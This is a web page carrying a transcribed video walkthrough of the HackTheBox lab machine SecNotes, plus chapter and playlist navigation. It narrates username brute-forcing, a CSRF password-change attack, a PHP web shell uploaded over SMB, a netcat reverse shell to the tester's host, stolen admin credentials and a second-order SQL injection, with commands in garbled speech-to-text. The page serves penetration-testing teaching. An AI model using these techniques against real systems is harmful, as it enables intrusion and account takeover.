HackTheBox - SecNotes
Key Takeaways
This video demonstrates various cybersecurity techniques and tools, including SQL injection, cross-site scripting, and brute-force attacks, using tools like Burp Suite, Wfuzz, and PHP, to exploit vulnerabilities in a web application and gain access to the system.
Full Transcript
what's going on YouTube is hip ii do insectoid some hacked the box which was a relatively easy box but even easier box if you found the unintended SQL injection that lets you bypass the first part of the box which was a cross-site request forgery type of attack so you get presented a web application and you can register user you register the user and upon looking at the features of the site you see that you can create notes change your password and send a note to the admin if you want go to change your password you'll notice that it doesn't require you to type your old password doesn't have a cross-site request forgery token and it's also accessible through a get request leaving it to be a really easy cross-site request forgery attack you send a link to the admin he clicks it it changes his password and then you're presented with a way to drop files on the web server you drop a web shell get a low privileged shell and then go hunting through the box you notice that bash on Windows is installed and if you pillage through those files you'll find the administrator password and the bash history file so enough talking let's just jump in as always the first thing we do is run and map with dash SC for default scripts SV enumerate versions oay up at all formats but in the end map folder and call it sec notes and then the IP address which is 10 10 10 97 this can take some time to run so I've already run it looking at the results we see just two ports are open we have microsoft iis on port 80 and it's running httpd 10.0 so we know this is gonna be like Windows 10 or 2016 and then we also have SMB open and it's saying Windows 10 Enterprise at 17 134 and we can kind of get a idea of a build date by just googling this if we whoops google that header we may see like a well that's odd good crash Firefox but move this back up and see what happens I wouldn't remember the size of the window okay start a new session let's Google this and do we have seventeen one three four on this page we do so we know this is gonna be in the eighteen or three redstone for April 2018 update so it's probably sometime between April and October of 2018 so let's just keep moving on and this information doesn't look that interesting we can get the machine name from this NetBIOS computer named the workgroup and that's about it so let's just go over to 1010 1097 and see what the actual website looks like we have a login form and just has user name and password so let's try logging with some default user names like admin password let's change this to never save and we get no account found with that username let's try an administrator password let's try some basic sequel injection if this except look if this is successful either way well again or we'll say or this error message will move it does not so let's try creating an account let's create the account if SEC will create the password of password logged in now let's put the username if SEC the password we'll put something and we get the password you entered is not valid so we now know we have a way to enumerate valid user names so what I'm going to do is send this over into burp suite so if we go here turn intercept on do if set please subscribe look at burp suite we see it does a post to login we got a username and password we don't have any like Sierra so CSRF tokens to worry about so let us go to our terminal W fuzz - H and we're gonna do aw fuzz and try to brute force a bunch of user names so let's do W fuzz - see for output with colors then the next thing we want to do is specify a word list so - W user share SEC list user names names names texts then the next thing we want to do is specify dash D for post data so dash D username is equal to fuzz and then password is equal to please subscribe and then the URL HTTP 10 10 10 97 and we get a bunch of 302s because I forgot slash login dot PHP I believe yep login dot PHP and then we need to do probably - - H s to hide I forget what S stands for but this is gonna be hiding if the page contains text and the text we want to search for is invalid username so let's turn rip sweet off well again put a bad user name no account found copy this paste this in and let this go so our account was hip set and we use the password of password so we can log in and then let's play with this page the first thing I notice is we have a user name and the email address so we have a potential user on this application let's try a new note let's do the title of center hip sac flash Center would do was here save this note and we can see everything is centered we do a search on the page for epoch we see it is not doing any filtering whatsoever on this HTML so we can do like cross-site scripting attack so if we wanted you cross-site scripting attacks we have to have a way to link to this note announce you type a link to these notes let's copy this URL paste this in and instead of delete let's try view and it just deleted my note so it doesn't look like we can do anything there we could send it to W fuzz and try to brute-force various things but my guess is it's not going to be a vulnerability so with try other features of this application change password we can change it to please subscribe and then let's intercept this request so turn it on submit it and let's see we can drop that one and now we're at the change pass intercept and a few things to note is there's no like cross-site request forgery token just like on login and then it's also not asking us to confirm our old password so anyone that goes to this page you may be able to force them to change the password so I'm going to send this over into repeater and we're going to try just hitting go and seeing what happens if we click render it doesn't show anything so let's try change the password to please subscribe to hips ik and then we're going to change this request method into a get click go and it looks like an update or a password because we don't see any error messages so let us just go back into Firefox we can disable burp we can sign out do that's what my clip what content is so logging whip set paste my clipboard and it did indeed change the past by just going to a URL so this is looking like it's going to be some type of cross-site scripting challenge just based upon all that and the fact that it happens in the actual URL is nice because we don't have to do a bunch of JavaScript and have like a javascript submit a post request I forget what video I've done that on it was one of the very early hack to box videos I'll try to put a link in the comments or description of the video so you can go there if you want to see how to do that type of stuff but I'm gonna keep it easy here we go to the contact and let's just see if he follows links so we're gonna send him to our box which is 10 10 14 to and it looks like W fuss has finished and the only account it found was Tyler so if we do NCL VMP 9001 actually what we wanted to do if config tun 0 yes I am 10 10 14 - let's direct him to 9001 send this and immediately get a connection back we can see the user agent is Windows PowerShell which is odd but I'm guessing that's just because it's coded to immediately navigate to URLs you send to Tyler so let's see if it actually follows links like on the page so let's create a new directory make dub dub dub and what we're going to do is create test HTML and in this we're just going to do a frame source is equal to http but we can just copy and paste and go to burp copy this do HTTP 10 10 10 97 slash that oh no V screwed up there we go get rid of this / okay / iframe and we'll change the password so we test them in ourselves first and we'll just change it to please subscribe okay then we just toast this Python M simple HTTP server open on port 80 so if I go to 1010 14 - we have test on HTML I click this we see password updated and if I sign out go here let's cat test copy please subscribe and try to login we get in so let's first a web service again and send a link over to Tyler so HTTP 10 10 10 / 10 10 14 to test HTML and that's going to direct Tyler to a page there we go and if we sign out and sign in as Tyler and did not work let's try this again tip sec please subscribe and let's instead of sending him through an iframe and all that stuff maybe a PowerShell was not doing that let's just send this actually we can verify if this is working so let's comment this out and then we can do another iframe source is equal to HT P 10 10 10 90 a 10 10 14 to test forward there's this again and if we go to the page we go to a test HTML we see we get it and then we send another get request so if we send this link over to Tyler we'll see if he follows it so contact us HTTP 10 10 14 to test HTML sent he gets it but he doesn't follow the iframe and that's again probably because he is using windows powershell and this is not an actual web browser so the logic on it is pretty dumb so to work with that all we're going to do is copy the URL that we're trying to direct them to and go to contact us and some directly there so this whole logic thing is also how you know you don't have to do any fancy cross-site scripting because the web browser is dumb so let's sign out let's try logging it with Tyler please subscribe and we get logged in we get a note of me me sticky buns it will click a recipe years I don't know that new site and we have what looks like to be a SMB share a username and a password so let's test the cell with the program called SMB map so the syntax is SMB map - H and this should be in Cali if you just have to install it so let's just search SMB map is it it is so syntax we want is SMB map - you for user name which is Tyler - P the password which is going to be this 90 to thing then - capital 8 for the host and that's 10 10 10 97 it's gonna find the SMB ports and then list what shares are available and you can see there's a share that is new site that is readwrite so let's do SMB client - capital u the username % the password and then we want 10-10-10 97 new - site we can do dir and we see there's an eye is dot HTML HTM and I is dot dot PNG so we have a page if we try to go to this though I is start HTM we get 404 not found so there's something we're not seeing here so the first thing I'm going to do is add map - V will do - - max retry set that to zero and dash V is going to show us open ports as it scans max retry 0 is going to make this go a bit faster would you - t5 to make this a super aggressive and then we just want - B - 10 10 10 97 so just checking if there's any ports open on this that we have missed we have 84 4 5 and then we can also go over over into Berk and if we just do a get on slash click go we get viewing notes that's fine let's change this to let's see is there a hosting yep host here SEC notes HDB just in case there's any type of like virtual host routing because we know the host name of this box is set not htb as did and map tells that as well so doing this we get the same exact page so chances are there's nothing unique there let's go back in the terminal and we don't have any extra ports open yet and there we go we have finished and we have one extra port open that is eight eight zero eight so let's go and check this eight eight oh eight and we get that welcome page so go back over into the SMB client and let's create various scripts so let's try a PHP first so shell PHP and we'll just do PHP system and then get tip sack instead of get will do requests so it can be done with post or get requests and if we put shell dot PHP /l dot PHP a 500 internal server error EPS ACK equals Who am I we get sec note slash Tyler's so we definitely have code execution here let us get a reverse shell and we can either do powershell one-liners or we can just upload netcat i like normally just uploading that cat because I find it handles like the TTY is better so netcat windows let's go to NC 64 windows there we go I always get from this eternally board site save link as it's in downloads it's fine so move downloads on netcat okay unzip netcat we got NC 64 as well so let's put NC 64 exe and cl vnp on port 9001 and then in our show we just want to do NC 64 exe and 1014 to 9001 - e PowerShell we go back to a terminal we have a low privileged shell on this box I believe we do Who am I it will take a while but it does come back as Tyler we can do who am i / all see what tokens we have and it doesn't look like we have any commonly abusable tokens that would allow us to do like juicy potato I forget what name that is off top my head but I would definitely memorized listed like se impersonation token that's what it is so don't have that so nothing too interesting there so let's go see D backslash c d users tyler desktop and then we can do get content user dot txt and then measure object - what is it character and we can see use it our text is 32 characters long which is an md5 sum we also have some weird stuff like bash dot l NK if we do get content bash dot l NK we do see it is a link that is going to windows system32 bash exe so we have bash on windows installed we just type bash it looks like a TTY is screwed up but we are now literally running bash on windows and we're in slash mountain see users Tyler desktop we go to just slash we're at the root of the filesystem if we do Who am I with the root user so let's try was it Mountain see CD users administrator and we still can't get there so even though it's showing us as the root user this is kind of a guest just a VM or something because we're not admin on the box so let's just go to slash and instead of going into Mount let's go into slash root filesystem I'll ask away what is file system file file system it's a directory LS file system looks like it's a blank directory we do see that bash history does have contents in it so let's cap this and we can see a username and password on this box and that's the same exact syntax as we had done to access the box that's Tyler so let's just copy this rename a window to lo Prive create a new one paste this in instead of one 27001 let's do 10 10 10 97 and we are on the box as administrator now so CD users administrator and then we can go into desktop and then get route text then we just do WC - C on route text 34 characters I guess there may be two line breaks or something in there but I can assure you this is the route text of the box so let's go back exit out of this and go back to just play an old powershell if you didn't want to execute bash or you had problems with that TTY you could always go into app data local packages and let's see where is it this canonical and there's gonna be where Windows actually installs the VM or bash on Linux so fashion on Windows whatever it is that weird thing that allows you to run bash on Windows so we can go into this and then we got route FS and then we're in that as well so dir and then get content bash history and we can see the same exact thing so let's see here we're just viewing the filesystem as admin I do have impact installed on this so we can just do PS exec and then administrator at 1010 1097 copy this password paste it in and it looks like it is gonna give us a shell on this box come on there we go and if we do Who am I we are anti-authority slash system so that is how you do this box and let us go and do a little bit extra now so there is a alternative path if we went into Firefox and let's go all the way back to the very beginning of this box so home let's sign out and let's create a new user and let's do SQL injection in the username so we'll do please subscribe or one equals one think that will work we'll do pass with a password submit and then type password and we get logged in and we have all the notes and we can see the credentials this way so let's examine exactly why this works and do a little bit of static code analysis and the cool thing about this is we see all the notes this is the notes of Tyler this is the notes of hip sack so let us see why this works by downloading all the PHP files so make the PHP in here and then run SMB client to well again do dir we want to go into I net pub see backslash I net pub I mistyped it and then dub-dub-dub root CD I n ET PU be there we go CD into dub-dub-dub root and then we'll just get all these files and now they did that I wonder if this has the m git command and get stirred up PHP that would be a easier way to do it just use M get instead of doing what I did and doing gets on every single file and get as I'd multi get so now we have all the PHP files so we can search for things like grab - be for before - a for after and then we can search for things like system ster dot PHP and see if this thing ever calls system it does not let's search for holding do - I as well to make it case insensitive powershell CMD SQL and we get a bunch so let's see it looks like generally Oh XD f is using this dollar SQL thing and he does this relatively every time so we can just search for dollar SQL to kind of filter out some of the noise and we can see all the spots where this actually interacts with the database so we see right here we're doing SQL we got question marks here and prepared statement so we can ignore this submit note move up we have insert into users username password and prepared statement register let's see was that sequel question mark prepared statement question mark prepared statement and here we have what is equal to username and then does a statement but if the user can control this value maybe we'd have SQL injection here this is on home PHP go up the next one prepared change password is prepared as well so the only time the Creator didn't use a prepared statement is right here so let's look at home dot PHP but let's just look at how user name gets declared so let's do the grep again we'll do username equals can we so on register dot PHP with setting it to the variable so this is definitely user controlled right here let's see off PHP username is equal to session username and their session let's see how does this get set DB username empty trim I believe the session is getting it from [Music] the post request of the user sense but we can verify this by just doing another grip and this time we'll do underscore session space I think just underscore session and then let's filter out some of the noise before we do that so Wes home dot PHP will require auth NDB so we should be able to do aught PHP DB PHP home dot PHP naturally since the session variable we need do them all because it can write it in any file and then it pulls it from that session so let's just do this and go through all the noise so let's see session can we specify user name change these single quotes to double quotes and escape that there we go so on login dot PHP the session is setting session username to this if we will get the whole code we have if the password is correct start a session and then write the username that was sent from the user into this so you have a second order SQL injection which means it's not a direct access to sequel but it's pulling it from a tainted resource that then causes the sequel SQL injection and this is somewhat common when developers going to the mindset of never trusting user input when the mindset should be never trust any input because just because it didn't come directly from the user doesn't mean it wasn't created by the user in the first place in this case the user created that database field for the username and there was a prepared statement around that so it wasn't injectable but it just got stored in the database and became a ticking time-bomb for when code grabbed it from that database and then used it in a sanitized way so hope you guys enjoy that and that's the Box take care and I will see you all next week
Original Description
01:05 - Begin of recon
02:45 - Checking out the website
03:50 - Using wfuzz to enumerate usernames
05:45 - Logging in with an account we created
07:23 - Checking out Change Password and noticing it does this poorly
09:25 - Using the contact form, to see if tyler will follow links
14:14 - Changing Tyler's password by sending him to the ChangePassword Page
15:00 - Logged in and find SMB Share with credentials.
16:15 - Found a webshare but not sure the directory it executes from. Begin hunting for a different webserver.
17:48 - Port 8808 found via nmap'ing all ports. Creating a php script to gain code execution
19:15 - Downloading netcat for windows to use as a Reverse Shell
21:14 - Playing with Bash on Windows
22:35 - Finding the administrator password in ~/.bash_history
-- Box done
23:45 - Alternate way to find the .bash_history file
25:36 - Unintended way to bypass the CSRF. SQL Injection + bad Static Code analysis
In the Holiday video, I do a bit more that may be helpful with card type attacks
: https://www.youtube.com/watch?v=FvHyt7KrsPE&app=desktop
Watch on YouTube ↗
(saves to browser)
Sign in to unlock AI tutor explanation · ⚡30
Playlist
Uploads from IppSec · IppSec · 0 of 60
← Previous
Next →
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
HHC2016 - Analytics
IppSec
HackTheBox - October
IppSec
HackTheBox - Arctic
IppSec
HackTheBox - Brainfuck
IppSec
HackTheBox - Bank
IppSec
HackTheBox - Joker
IppSec
HackTheBox - Lazy
IppSec
Camp CTF 2015 - Bitterman
IppSec
HackTheBox - Devel
IppSec
Reversing Malicious Office Document (Macro) Emotet(?)
IppSec
HackTheBox - Granny and Grandpa
IppSec
HackTheBox - Pivoting Update: Granny and Grandpa
IppSec
HackTheBox - Optimum
IppSec
HackTheBox - Charon
IppSec
HackTheBox - Sneaky
IppSec
HackTheBox - Holiday
IppSec
HackTheBox - Europa
IppSec
Introduction to tmux
IppSec
HackTheBox - Blocky
IppSec
HackTheBox - Nineveh
IppSec
HackTheBox - Jail
IppSec
HackTheBox - Blue
IppSec
HackTheBox - Calamity
IppSec
HackTheBox - Shrek
IppSec
HackTheBox - Mirai
IppSec
HackTheBox - Shocker
IppSec
HackTheBox - Mantis
IppSec
HackTheBox - Node
IppSec
HackTheBox - Kotarak
IppSec
HackTheBox - Enterprise
IppSec
HackTheBox - Sense
IppSec
HackTheBox - Minion
IppSec
VulnHub - Sokar
IppSec
VulnHub - Pinkys Palace v2
IppSec
HackTheBox - Inception
IppSec
Vulnhub - Trollcave 1.2
IppSec
HackTheBox - Ariekei
IppSec
HackTheBox - Flux Capacitor
IppSec
HackTheBox - Jeeves
IppSec
HackTheBox - Tally
IppSec
HackTheBox - CrimeStoppers
IppSec
HackTheBox - Fulcrum
IppSec
HackTheBox - Chatterbox
IppSec
HackTheBox - Falafel
IppSec
How To Create Empire Modules
IppSec
HackTheBox - Nightmare
IppSec
HackTheBox - Nightmarev2 - Speed Run/Unintended Solutions
IppSec
HackTheBox - Bart
IppSec
HackTheBox - Aragog
IppSec
HackTheBox - Valentine
IppSec
HackTheBox - Silo
IppSec
HackTheBox - Rabbit
IppSec
HackTheBox - Celestial
IppSec
HackTheBox - Stratosphere
IppSec
HackTheBox - Poison
IppSec
HackTheBox - Canape
IppSec
HackTheBox - Olympus
IppSec
HackTheBox - Sunday
IppSec
HackTheBox - Fighter
IppSec
HackTheBox - Bounty
IppSec
More on: AI Security
View skill →Related Reads
📰
📰
📰
📰
Top 5 Undiscovered AI Pentesting Tools for Kali Linux in 2026
Medium · AI
Top 5 Undiscovered AI Pentesting Tools for Kali Linux in 2026
Medium · Programming
Top 5 Undiscovered AI Pentesting Tools for Kali Linux in 2026
Medium · Cybersecurity
Critical phpBB Authentication Bypass Allows Instant Account Takeover
Dev.to · BeyondMachines
Chapters (15)
1:05
Begin of recon
2:45
Checking out the website
3:50
Using wfuzz to enumerate usernames
5:45
Logging in with an account we created
7:23
Checking out Change Password and noticing it does this poorly
9:25
Using the contact form, to see if tyler will follow links
14:14
Changing Tyler's password by sending him to the ChangePassword Page
15:00
Logged in and find SMB Share with credentials.
16:15
Found a webshare but not sure the directory it executes from. Begin hunting fo
17:48
Port 8808 found via nmap'ing all ports. Creating a php script to gain code ex
19:15
Downloading netcat for windows to use as a Reverse Shell
21:14
Playing with Bash on Windows
22:35
Finding the administrator password in ~/.bash_history
23:45
Alternate way to find the .bash_history file
25:36
Unintended way to bypass the CSRF. SQL Injection + bad Static Code analysis
🎓
Tutor Explanation
DeepCamp AI